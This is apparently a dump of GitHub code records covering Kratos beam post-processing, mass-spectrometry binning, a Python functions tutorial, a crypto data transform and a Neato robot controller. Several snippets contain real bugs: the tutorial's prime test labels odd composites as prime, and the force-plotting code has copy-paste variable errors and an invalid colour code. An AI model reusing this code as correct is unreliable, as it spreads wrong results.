curve_geometry.ShapeFunctionsAt(t, order=3)\n\n # nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n # element = self.model.add_element('IgaBeamADElement', nonzero_nodes, material)\n\n # element.SetValue(INTEGRATION_WEIGHT, weight)\n\n # element.SetValue(SHAPE_FUNCTION_VALUES , shape_functions[0])\n # element.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n # element.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n # element.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n # p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n # element.SetValue(BASE_A1, A1.tolist())\n # element.SetValue(BASE_A2, A2.tolist())\n # element.SetValue(BASE_A3, A3.tolist())\n # element.SetValue(BASE_A1_1, A1_1.tolist())\n # element.SetValue(BASE_A2_1, A2_1.tolist())\n # element.SetValue(BASE_A3_1, A3_1.tolist())\n\n def t0(self):\n act_curve_geometry = self.curve_geometry.Clone()\n domain = act_curve_geometry.Domain()\n return domain.T0()\n\n def t1(self):\n act_curve_geometry = self.curve_geometry.Clone()\n domain = act_curve_geometry.Domain()\n return domain.T1()\n\n def add_coupling(self, t, other, other_t, penalty, geometry):\n material = self.model.add_beam_properties('dummy_material',\n area = 0, it = 0, iy = 0, iz = 0,\n youngs_modulus = 0, shear_modulus = 0,\n )\n\n curve_geometry_a = self.curve_geometry\n curve_geometry_b = other.curve_geometry\n\n nonzero_node_indices_a, shape_functions_a = curve_geometry_a.ShapeFunctionsAt(t = t, order=3)\n nonzero_node_indices_b, shape_functions_b = curve_geometry_b.ShapeFunctionsAt(other_t, order=3)\n\n nonzero_nodes = []\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices_a]\n nonzero_nodes_b = [other.nodes[index] for index in nonzero_node_indices_b]\n\n nonzero_nodes.extend(nonzero_nodes_b)\n\n condition = self.model.add_element('IgaBeamADWeakCoupling', nonzero_nodes, material)\n\n condition.SetValue(SHAPE_FUNCTION_VALUES , shape_functions_a[0])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions_a[1])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions_a[2])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions_a[3])\n\n condition.SetValue(SHAPE_FUNCTION_VALUES_B , shape_functions_b[0])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1_B, shape_functions_b[1])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2_B, shape_functions_b[2])\n condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3_B, shape_functions_b[3])\n\n XA, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n condition.SetValue(BASE_A1, A1.tolist())\n condition.SetValue(BASE_A2, A2.tolist())\n condition.SetValue(BASE_A3, A3.tolist())\n condition.SetValue(BASE_A1_1, A1_1.tolist())\n condition.SetValue(BASE_A2_1, A2_1.tolist())\n condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n XB, B1, B1_1, B2, B2_1, B3, B3_1 = other.frame_at(other_t)\n\n condition.SetValue(BASE_B1, B1.tolist())\n condition.SetValue(BASE_B2, B2.tolist())\n condition.SetValue(BASE_B3, B3.tolist())\n condition.SetValue(BASE_B1_1, B1_1.tolist())\n\n geometry.Add(an.Point3D(location=XA))\n geometry.Add(an.Point3D(location=XB))\n\n if 'displacement_x' in penalty:\n DISPLACEMENT_X = penalty[\"displacement_x\"]\n if 'disp_x' in penalty:\n DISPLACEMENT_X = penalty[\"disp_x\"]\n if 'displacement_y' in penalty:\n DISPLACEMENT_Y = penalty[\"displacement_y\"]\n if 'disp_y' in penalty:\n DISPLACEMENT_Y = penalty[\"disp_y\"]\n if 'displacement_z' in penalty:\n DISPLACEMENT_Z = penalty[\"displacement_z\"]\n if 'disp_z' in penalty:\n DISPLACEMENT_Z = penalty[\"disp_z\"]\n if 'torsion' in penalty:\n TORSION = penalty[\"torsion\"]\n if 'tors' in penalty:\n TORSION = penalty[\"tors\"]\n if 'rotation_2' in penalty:\n ROTATION_2 = penalty[\"rotation_2\"]\n if 'rot_2' in penalty:\n ROTATION_2 = penalty[\"rot_2\"]\n if 'rotation_3' in penalty:\n ROTATION_3 = penalty[\"rotation_3\"]\n if 'rot_3' in penalty:\n ROTATION_3 = penalty[\"rot_3\"]\n\n condition.SetValue(PENALTY_DISPLACEMENT_X, DISPLACEMENT_X)\n condition.SetValue(PENALTY_DISPLACEMENT_Y, DISPLACEMENT_Y)\n condition.SetValue(PENALTY_DISPLACEMENT_Z, DISPLACEMENT_Z)\n condition.SetValue(PENALTY_TORSION, TORSION)\n condition.SetValue(PENALTY_ROTATION_2, ROTATION_2)\n condition.SetValue(PENALTY_ROTATION_3, ROTATION_3)\n\n def update(self, time_step):\n geometry = self.model.geometry\n act_curve_geometry = self.curve_geometry.Clone()\n\n for i, node in enumerate(self.nodes):\n act_curve_geometry.SetPole(i, [node.X, node.Y, node.Z])\n\n act_curve_geometry_key = f'{self.key}.Step<{time_step}>'\n act_curve_geometry_ptr = geometry.Add(act_curve_geometry_key, act_curve_geometry)\n\n key = self.key.replace('.CurveGeometry3D', '')\n curve_key = f'{key}.Step<{time_step}>'\n curve_ptr = geometry.Add(curve_key, an.Curve3D(act_curve_geometry_ptr))\n\n curve_ptr.Attributes().SetLayer(f'Step<{time_step}>')\n\n domain = act_curve_geometry.Domain()\n\n for t in np.linspace(domain.T0(), domain.T1(), 10):\n _, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n T = normalized(A1)\n T_1 = normalized_1(A1, A1_1)\n\n def act_phi_at(t):\n nonzero_node_indices, shape_functions = self.curve_geometry.ShapeFunctionsAt(t, order=1)\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n act_values = np.array([node.GetSolutionStepValue(DISPLACEMENT_ROTATION) for node in nonzero_nodes])\n\n phi, phi_1 = np.dot(shape_functions, act_values)\n\n return phi, phi_1\n\n phi, phi_1 = act_phi_at(t)\n\n x, a1, a1_1 = act_curve_geometry.DerivativesAt(t, order=2)\n\n a11 = np.dot(a1, a1)\n a = np.sqrt(a11)\n\n t = normalized(a1)\n t_1 = a1_1 / a - np.dot(a1, a1_1) * a1 / a**3\n\n rod = compute_rod(t, phi)\n rod_1 = compute_rod_1(t, t_1, phi, phi_1)\n\n lam = compute_lam(T, t)\n lam_1 = compute_lam_1(T, T_1, t, t_1)\n\n rod_lam = np.dot(rod , lam )\n rod_1_lam = np.dot(rod_1, lam )\n rod_lam_1 = np.dot(rod , lam_1)\n\n a2 = np.dot(rod_lam, A2)\n a3 = np.dot(rod_lam, A3)\n\n scale = 0.25\n\n # line_ptr = geometry.Add(an.Line3D(a=x, b=x+a1*scale/np.linalg.norm(a1)))\n # line_ptr.Attributes().SetLayer(f'local coordinates a1')\n # line_ptr.Attributes().SetColor(f'#ff0000')\n # # line_ptr.Attributes().SetArrowhead('End')\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=x+a2*scale))\n line_ptr.Attributes().SetLayer(f'local coordinates a2')\n line_ptr.Attributes().SetColor(f'#00ff00')\n # line_ptr.Attributes().SetArrowhead('End')\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=x+a3*scale))\n line_ptr.Attributes().SetLayer(f'local coordinates a3')\n line_ptr.Attributes().SetColor(f'#0000ff')\n # line_ptr.Attributes().SetArrowhead('End')\n\n def print_forces(self, scale):\n fname = 'kratos_data.txt'\n data = np.loadtxt(fname, dtype={'names': ('Id', 'x', 'y', 'z', 'N', 'M2', 'M3', 'Mt', 't_0', 't_1', 't_2', 'a2_0', 'a2_1', 'a2_2', 'a3_0', 'a3_1', 'a3_2'),\n 'formats': ('i4', 'f4', 'f4' , 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4')}\n , skiprows=0)\n\n # print(data)\n\n frame = np.loadtxt('frames.txt', dtype=np.str, delimiter='\\s')\n\n geometry = self.model.geometry\n\n i = len(data) -1\n list_n = np.array([])\n list_m2 = np.array([])\n list_m3 = np.array([])\n list_mt = np.array([])\n\n while data[i][0] > 1:\n list_n = np.append(list_n , np.absolute(data[i][4]))\n list_m2 = np.append(list_m2, np.absolute(data[i][5]))\n list_m3 = np.append(list_m3, np.absolute(data[i][6]))\n list_mt = np.append(list_mt, np.absolute(data[i][7]))\n\n # if data[i][0] == 1:\n # break\n i -= 1\n\n norm_n =np.amax(list_n) # normalize forces\n norm_m2 = np.amax(list_m2)\n norm_m3 = np.amax(list_m3)\n norm_mt = np.amax(list_mt)\n # norm_n = 1 # do not normalize forces\n # norm_m2 = 1\n # norm_m3 = 1\n # norm_mt = 1\n\n a2 = [data['a2_0'][-1], data['a2_1'][-1], data['a2_2'][-1]]\n a3 = [data['a3_0'][-1], data['a3_1'][-1], data['a3_2'][-1]]\n\n n = np.dot(a3, data['N'][-1] * scale)\n if norm_n != 0: n = np.dot(a3, data['N'][-1] * scale/norm_n)\n\n m2 = np.dot(a2, data['M2'][-1] * scale)\n if norm_m2 != 0: m2 = np.dot(a2, data['M2'][-1] * scale / norm_m2)\n\n m3 = np.dot(a3, data['M3'][-1] * scale)\n if norm_m3 != 0: m3 = np.dot(a3, data['M3'][-1] * scale / norm_m3)\n\n mt = np.dot(a3, data['Mt'][-1] * scale)\n if norm_mt != 0: m3 = np.dot(a3, data['M3'][-1] * scale / norm_mt)\n\n #Print starting line off the loop\n x_old_n = np.add([data[-1][1], data[-1][2], data[-1][3]], -n)\n x_old_m2 = np.add([data[-1][1], data[-1][2], data[-1][3]], m2)\n x_old_m3 = np.add([data[-1][1], data[-1][2], data[-1][3]], m3)\n x_old_mt = np.add([data[-1][1], data[-1][2], data[-1][3]], mt)\n\n line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_n,n), b= np.add(np.add(x_old_n,-n), n)))\n line_ptr.Attributes().SetLayer(f'Normalkraft N1')\n if data[i][4] <= 0:\n line_ptr.Attributes().SetColor(f'#05293') # negative forces = red\n else:\n line_ptr.Attributes().SetColor(f'#05293') # positive forces = blue\n\n line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_m2, -m2), b=np.add(np.add(x_old_m2, -m2), m2)))\n line_ptr.Attributes().SetLayer(f'Moment My')\n if data[i][5] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#0000ff')\n\n line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_m3, -m3), b=np.add(np.add(x_old_m3, -m3), m3)))\n line_ptr.Attributes().SetLayer(f'Moment Mz')\n if data[i][6] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#0000ff')\n\n line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_mt, -mt), b=np.add(np.add(x_old_mt, -mt), mt)))\n line_ptr.Attributes().SetLayer(f'Moment Mt')\n if data[i][7] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#0000ff')\n\n\n i = len(data) -2\n while data[i][0] >= 0:\n\n a2 = [data['a2_0'][i], data['a2_1'][i], data['a2_2'][i]]\n a3 = [data['a3_0'][i], data['a3_1'][i], data['a3_2'][i]]\n\n x = [data[i][1], data[i][2], data[i][3]]\n\n n = np.dot(a3, data['N'][i] * scale)\n if norm_n != 0: n = np.dot(a3, data['N'][i] * scale/norm_n)\n\n m2 = np.dot(a3, data['M2'][i] * scale)\n if norm_m2 != 0: m2 = np.dot(a3, data['M2'][i] * scale / norm_m2)\n\n m3 = np.dot(a2, data['M3'][i] * scale)\n if norm_m3 != 0: m3 = np.dot(a2, data['M3'][i] * scale / norm_m3)\n\n mt = np.dot(a3, data['Mt'][i] * scale)\n if norm_mt != 0: mt = np.dot(a3, data['Mt'][i] * scale / norm_mt)\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, -n)))\n line_ptr.Attributes().SetLayer(f'Normalkraft N')\n if data[i][4] <= 0:\n line_ptr.Attributes().SetColor(f'#05293')\n else:\n line_ptr.Attributes().SetColor(f'#05293')\n\n line_ptr = geometry.Add(an.Line3D(a=x_old_n, b=np.add(x, -n)))\n line_ptr.Attributes().SetLayer(f'Normalkraft N')\n if data[i][4] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#ff0000')\n x_old_n = np.add(x, -n)\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, m2)))\n line_ptr.Attributes().SetLayer(f'Moment My')\n if data[i][6] <= 0:\n line_ptr.Attributes().SetColor(f'#05293')\n else:\n line_ptr.Attributes().SetColor(f'#05293')\n\n line_ptr = geometry.Add(an.Line3D(a=x_old_m2, b=np.add(x, m2)))\n line_ptr.Attributes().SetLayer(f'Moment My')\n if data[i][6] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#ff0000')\n x_old_m2 = np.add(x, m2)\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, m3)))\n line_ptr.Attributes().SetLayer(f'Moment Mz')\n if data[i][5] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#0000ff')\n\n line_ptr = geometry.Add(an.Line3D(a=x_old_m3, b=np.add(x, m3)))\n line_ptr.Attributes().SetLayer(f'Moment Mz')\n if data[i][5] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#0000ff')\n x_old_m3 = np.add(x, m3)\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, mt)))\n line_ptr.Attributes().SetLayer(f'Moment Mt')\n if data[i][7] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#0000ff')\n\n line_ptr = geometry.Add(an.Line3D(a=x_old_mt, b=np.add(x, mt)))\n line_ptr.Attributes().SetLayer(f'Moment Mt')\n if data[i][7] <= 0:\n line_ptr.Attributes().SetColor(f'#ff0000')\n else:\n line_ptr.Attributes().SetColor(f'#0000ff')\n x_old_mt = np.add(x, mt)\n\n\n if data[i][0] == 1:\n break\n\n i -= 1\n\n def print_displacement(self, Id=[]):\n act_curve_geometry = self.curve_geometry.Clone()\n\n #Header\n print('\\nDisplacements of ' + str(self.key))\n\n if Id:\n node = self.nodes[Id]\n print(\n f\"{'Id:':<4}{k:<4}\",\n f\"{'x:':<4}{node.X - node.X0:<30}\" ,\n f\"{'y:':<4}{node.Y - node.Y0:<30}\" ,\n f\"{'z:':<4}{node.Z - node.Z0:<30}\" ,\n f\"{'r:':<4}{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):<30}\" ,\n )\n\n else:\n for k, pole in enumerate(act_curve_geometry.Poles()):\n node = self.nodes[k]\n print(\n f\"{'Id:':<4}{k:<4}\",\n f\"{'x:':<4}{node.X - node.X0:<30}\" ,\n f\"{'y:':<4}{node.Y - node.Y0:<30}\" ,\n f\"{'z:':<4}{node.Z - node.Z0:<30}\" ,\n f\"{'r:':<4}{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):<30}\" ,\n )\n\n def write_displacement(self, nstep=0):\n act_curve_geometry = self.curve_geometry.Clone()\n\n with open('displacements.txt', 'a') as stream:\n print('# Kratos Output Displacements \\n#', file=stream)\n print('# ' + str(self.curve_geometry_ptr.Key()), file=stream)\n print(f'# solution step :: {nstep}', file=stream)\n print('{:>4s}'.format('# Id')+\n '{:>31s}'.format('Init x:')+\n '{:>31s}'.format('Init y:')+\n '{:>31s}'.format('Init z:')+\n '{:>31s}'.format('Init rotartion:')+\n '{:>31s}'.format('Disp x')+\n '{:>31s}'.format('Disp y')+\n '{:>31s}'.format('Disp z')+\n '{:>31s}'.format('Disp rotation')\n , file=stream\n )\n\n print('#', end='', file=stream)\n for i in range(251):\n print('*', end='', file=stream)\n print('#', file=stream)\n\n for k, pole in enumerate(act_curve_geometry.Poles()):\n node = self.nodes[k]\n\n print(f'{k+1:>4d}',\n f'{node.X0:>30}',\n f'{node.Y0:>30}',\n f'{node.Z0:>30}',\n f'{node.GetValue(DISPLACEMENT_ROTATION):>30}',\n f'{node.X - node.X0:>30}',\n f'{node.Y - node.Y0:>30}',\n f'{node.Z - node.Z0:>30}',\n f'{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):>30}', file=stream\n # '\\n'\n )\n\n stream.close()\n\n # # benchmark output \n # with open('benchmark_m3.txt', 'r+') as m3:\n # data_m3 = m3.read()\n\n # with open('benchmark_mt.txt', 'r+') as mt:\n # data_mt = mt.read()\n\n # node = self.nodes[-1]\n # with open('benchmark.txt', 'a') as bm:\n # print(f'{k+1:>4d}',\n # f'{node.Z - node.Z0:>30}',\n # f'{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):>30}',\n # f'{data_m3:>30}',\n # f'{data_mt:>30}',\n # file=bm )\n\n\n def make_header(self, nstep=0):\n header = open('kratos_data.txt', 'a')\n header.write('#\\n' + '# Kratos Output \\n#')\n header.write(f'\\n# solution step :: {nstep} \\n')\n header.write('{:>4s}'.format('# Id')+\n '{:>20s}'.format('Gauss x:')+\n '{:>20s}'.format('Gauss y:')+\n '{:>20s}'.format('Gauss z:')+\n '{:>30s}'.format('Normal Force:')+\n '{:>30s}'.format('Moment My:')+\n '{:>30s}'.format('Moment Mz:')+\n '{:>30s}'.format('Moment Mt:')+\n '{:>30s}'.format('local frame T:')+\n '{:>10s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')+\n '{:>30s}'.format('lokal frame N:')+\n '{:>10s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')+\n '{:>30s}'.format('lokal frame V:')+\n '{:>10s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')\n )\n header.write('\\n#')\n\n for i in range(434):\n header.write('*')\n header.write('\\n#\\n')\n\n header.close()\n\n def make_header_results(self, nstep=0):\n header = open('results.txt', 'a')\n header.write('#\\n' + '# Kratos Output Forces \\n#')\n header.write(f'\\n# solution step :: {nstep} \\n')\n header.write('{:>4s}'.format('# Id')+\n '{:>20s}'.format('Normal Force:')+\n '{:>20s}'.format('Moment My:')+\n '{:>20s}'.format('Moment Mz:')+\n '{:>20s}'.format('Moment Mt:')+\n '{:>20s}'.format('local frame T:')+\n '{:>10s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')+\n '{:>20s}'.format('lokal frame N:')+\n '{:>10s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')+\n '{:>20s}'.format('lokal frame V:')+\n '{:>10s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')\n )\n header.write('\\n#')\n\n for i in range(304):\n header.write('*')\n header.write('\\n#\\n')\n\n header.close()\n\n with open('kratos_postprocess.txt', 'r+') as kratos_data:\n content = kratos_data.read()\n\n p_stream = open('kratos_postprocess.txt', 'w')\n p_stream.write('#\\n' + '# Kratos Point Evaluation \\n#')\n p_stream.write(f'\\n# solution step :: {nstep} \\n')\n p_stream.write('{:>4s}'.format('# Id')+\n '{:>30s}'.format('Normal Force:')+\n '{:>30s}'.format('Moment My:')+\n '{:>30s}'.format('Moment Mz:')+\n '{:>30s}'.format('Moment Mt:')+\n '{:>30s}'.format('Rotation 2:')+\n '{:>30s}'.format('Rotation 3:')+\n '{:>20s}'.format('local frame T:')+\n '{:>21s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')+\n '{:>20s}'.format('lokal frame N:')+\n '{:>21s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')+\n '{:>20s}'.format('lokal frame V:')+\n '{:>21s}'.format('x')+\n '{:>21s}'.format('y')+\n '{:>21s}'.format('z')\n )\n p_stream.write('\\n#')\n\n for i in range(304):\n p_stream.write('*')\n p_stream.write('\\n#\\n')\n\n p_stream.write(content)\n\n p_stream.close()\n\n def write_results(self, nstep=0):\n fname = 'kratos_data.txt'\n data = np.loadtxt(fname, dtype={'names': ('Id', 'x', 'y', 'z', 'N', 'M2', 'M3', 'Mt', 't_0', 't_1', 't_2', 'a2_0', 'a2_1', 'a2_2', 'a3_0', 'a3_1', 'a3_2'),\n 'formats': ('i4', 'f4', 'f4' , 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4')}\n , skiprows=0)\n\n\n self.make_header_results(nstep)\n\n with open('results.txt', 'a') as stream:\n\n i = len(data) -1\n while data[i][0] >= 0:\n print(f\"{data['Id'][i]:>4d}\",\n f\"{data['N'][i]:>20f}\",\n f\"{data['M2'][i]:>20f}\",\n f\"{data['M3'][i]:>20f}\",\n f\"{data['Mt'][i]:>20f}\",\n f\"{data['t_0'][i]:>30f}\",\n f\"{data['t_1'][i]:>21f}\",\n f\"{data['t_2'][i]:>21f}\",\n f\"{data['a2_0'][i]:>30f}\",\n f\"{data['a2_1'][i]:>21f}\",\n f\"{data['a2_2'][i]:>21f}\",\n f\"{data['a3_0'][i]:>30f}\",\n f\"{data['a3_0'][i]:>21f}\",\n f\"{data['a3_0'][i]:>21f}\",\n file=stream\n )\n\n if data[i][0] == 1:\n break\n\n i -= 1\n\n # stream.close()\n\n def clear_memory(self):\n open('results.txt', 'w').close()\n open('kratos_data.txt', 'w').close()\n open('frames.txt', 'w').close()\n open('displacements.txt', 'w')\n open('kratos_postprocess.txt', 'w')\n\n\n","repo_name":"LukasRauch/BeamValiadation","sub_path":"pathon_anurbs/kratos_utilities.py","file_name":"kratos_utilities.py","file_ext":"py","file_size_in_byte":46087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8120720256","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 25 16:28:49 2021\n\n@author: leoicarus\n\"\"\"\nimport pandas as pd\nimport math\n\n\ndef collect_bins(bin_width,bin_precision,pre_result):\n\tresult={}\n\ttotal_fraction_number=len(pre_result)\n\tfor fraction in list(pre_result.keys()):\n\t\ttotal_sample_number=len(pre_result[fraction])\n\t\tfor sample_name in list(pre_result[fraction].keys()):\n\t\t\tprint('step_3:',sample_name,fraction)\n\t\t\tsample=pre_result[fraction][sample_name]\n\t\t\tsample.loc[:,'sample']=sample_name\n\t\t\tsample.loc[:,'fraction']=fraction\n\t\t\t\n\t\t\tfor index in sample.index:\n\t\t\t\tmass=sample.loc[index]['Tmz']\n\t\t\t\tmass_f=round(float(mass),bin_precision)\n\t\t\t\tbin_1_f=mass_f-bin_width+(1/math.pow(10,bin_precision))\n\t\t\t\twhile bin_1_f<=mass_f:\n\t\t\t\t\tbin_2_f=bin_1_f+bin_width\n\t\t\t\t\tbin_1=str(round(bin_1_f,bin_precision))\n\t\t\t\t\tbin_2=str(round(bin_2_f,bin_precision))\n\t\t\t\t\tbatch_number=int(bin_1_f*math.pow(10,bin_precision)/1000)\n\t\t\t\t\tnew_key=bin_1+'_'+bin_2\n\t\t\t\t\tif not batch_number in result.keys():\n\t\t\t\t\t\tresult[batch_number]={}\n\t\t\t\t\tif not new_key in result[batch_number].keys():\n\t\t\t\t\t\tresult[batch_number][new_key]=sample.loc[[index]]\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult[batch_number][new_key]=pd.concat([result[batch_number][new_key],sample.loc[[index]]],ignore_index=True)\n\t\t\t\t\tbin_1_f=bin_1_f+(1/math.pow(10,bin_precision))\n\tresult_all={}\n\tfor batch_number in result.keys():\n\t\tresult_all.update(result[batch_number])\n\treturn result_all,total_fraction_number,total_sample_number\n\n","repo_name":"PHOENIXcenter/deeprtalign","sub_path":"deeprtalign/collect_mass_information_shift_bins_no_disk.py","file_name":"collect_mass_information_shift_bins_no_disk.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"22307484533","text":"#!/user/bin/env python3\n\n#The kwyword def defines a function, and it will always include parenthesis even if no \n#arguments are passed. Also, notice the use of a default argument.\n\ndef function(n = 0):\n print(n)\n \n#A function must be called\nfunction(47)\n\n#All functions return a value\nx = function()\nprint(x)\n\n#Prime numbers are positive, and are bigger than 1, and it's factors are only 1 and itself\ndef is_prime(n):\n if n <= 1:\n return False\n for x in range (2, n):\n if n % x == 0:\n return False\n else:\n return True\n \ndef list_primes():\n for n in range(100):\n if is_prime(n):\n print(n, end=' ', flush=True)\n print()\n\nlist_primes() ","repo_name":"carlosgramos/python-essential-training","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28547052423","text":"import pandas as pd\r\nimport numpy as np\r\nfrom extract import get_exchange_rate\r\n\r\n# setting float and column width parameters\r\npd.set_option('display.float_format', '{:.10f}'.format)\r\npd.set_option('display.max_colwidth', -1)\r\n\r\n# the function below appends \"https://coinmarketcap.com\" to every crypto pair.\r\n# this makes it a weblink, where more information can be gathered regarding cypto pair.\r\ndef add_full_link(dataframe):\r\n base_link = \"https://coinmarketcap.com\"\r\n dataframe['Href'] = dataframe['Href'].apply([lambda x: base_link + x])\r\n return dataframe\r\n\r\n# the function below converts scrapped text in string format into float - use for price\r\ndef convert_to_float(dataframe, column):\r\n try: \r\n dataframe[column] = dataframe[column].astype(float)\r\n except ValueError as e:\r\n error_price = str(e).split(\"'\")[1]\r\n dataframe.loc[dataframe[column] == error_price, [column]] = 0.000000002131\r\n return dataframe\r\n\r\n# the function below converts scrapped text in string format into integer - use for volume\r\ndef convert_to_int(dataframe, column):\r\n dataframe[column] = dataframe[column].apply([lambda x : x.replace(',','')]).astype(int)\r\n return dataframe\r\n\r\n# the function use scrapped AUD/USD exchange rate to convert USD into AUD\r\ndef convert_to_aud(dataframe):\r\n exchange_rate = get_exchange_rate()\r\n dataframe['Price'] = dataframe['Price'].astype(float)\r\n dataframe[['Price', 'Volume']] = dataframe[['Price', 'Volume']]*exchange_rate\r\n return dataframe\r\n\r\n# the function execute all the above functions to return a transformed dataframe\r\ndef transform_data(dataframe):\r\n dataframe = add_full_link(dataframe)\r\n dataframe = convert_to_float(dataframe, 'Price')\r\n dataframe = convert_to_int(dataframe, 'Volume')\r\n dataframe = convert_to_aud(dataframe)\r\n return dataframe\r\n","repo_name":"usamatrq94/Prefect-ECSAgent-Deploy","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37327976475","text":"#!/usr/bin/python\n#coding: utf8\n\n\"\"\"\nImports\n\"\"\"\nimport time\nimport math\nimport serial\nimport atexit, termios # for keyboard reads\nimport sys, os # for keyboard reads\nfrom test_NeatoCommands import envia # \"envia\" function sends commands to Neato and returns Neato response, in case we need it\nimport numpy as np\nimport math\n\n# Inverse Kinematics Computation\ndef inverseKinematics(Vc, S, Tita_dot, Ts):\n\tvelR = Vc + ( S * Tita_dot) # mm/s\n\tvelL = Vc + (-S * Tita_dot) # mm/s\n\tdistancia_L = (velL * 10 * Ts) # mm\n\tdistancia_R = (velR * 10 * Ts) # mm\n\tmaxSpeed = max(abs(velL), abs(velR))\n\n\t# Command generation and sending\n\tif velL == 0 and velR == 0:\n\t\tenvia (ser,'SetMotor LWheelDisable RWheelDisable', 0.01,False)\n\t\tenvia(ser,'SetMotor LWheelEnable RWheelEnable', 0.01,False)\n\telse:\n\t\tcomando = 'SetMotor ' + str(distancia_L) + ' ' + str(distancia_R) + ' ' + str(maxSpeed)\n\t\tenvia(ser,comando, 0.01,False)\n\n### funcion angular angdiff\ndef angdiff(TH1, TH2):\n\tdiff = TH1 - TH2\n\tdiff = (diff + np.pi) % (2 * np.pi) - np.pi\n\treturn diff\n\n# Go to point\n# Vector de error, distancia\ndef goToPoint(goal, currentPose, Kv, Kh, r, S, ts):\n\tcurrentPose_out = currentPose\n\n\t## \n\tI_kine = lambda v_x, psi, r, S: [(1/r)*v_x + (1/r)*S*psi, (1/r)*v_x - (1/r)*S*psi]\n\todo_vel = lambda phi_r, phi_l, r, S, ts: [(1/2)*r*(phi_r+phi_l)*ts, (r/(2*S))*(phi_r-phi_l)*ts]\n\tPose_int = lambda X_ant, odo: [X_ant[0] + odo[0]*np.cos(X_ant[2]), X_ant[1] + odo[0]*np.sin(X_ant[2]), X_ant[2] + odo[1]]\n\n\tstop = False\n\twhile not stop:\n\t\tprint(currentPose)\n\t\t\n\t\tcurrentdiff = [goal[0] - currentPose[0], goal[1] - currentPose[1]]\n\t\tthrottle = np.sqrt(currentdiff[0]**2 + currentdiff[1]**2)\n\t\tif throttle < 0.1:\n\t\t\tstop = True\n\t\t\tcurrentPose_out = currentPose\n\t\t\treturn currentPose_out\n\t\telse:\n\t\t\t### VC\n\t\t\tvelocity = throttle * Kv\n\t\t\t### THETA PUNTO\n\t\t\tsteering = np.arctan2(currentdiff[1], currentdiff[0])\n\t\t\tpsi = angdiff(steering, currentPose[2]) * Kh\n\t\t\tphi_l_r = I_kine(velocity, psi, r, S)\n\t\t\tdeltas = odo_vel(phi_l_r[0], phi_l_r[1], r, S, ts)\n\t\t\tprint(deltas)\n\t\t\tcurrentPose = Pose_int(currentPose, [deltas[0], deltas[1]])\n\t\tinverseKinematics(velocity, S, steering, ts)\n\treturn currentPose_out\n\n\"\"\"\nfuncion 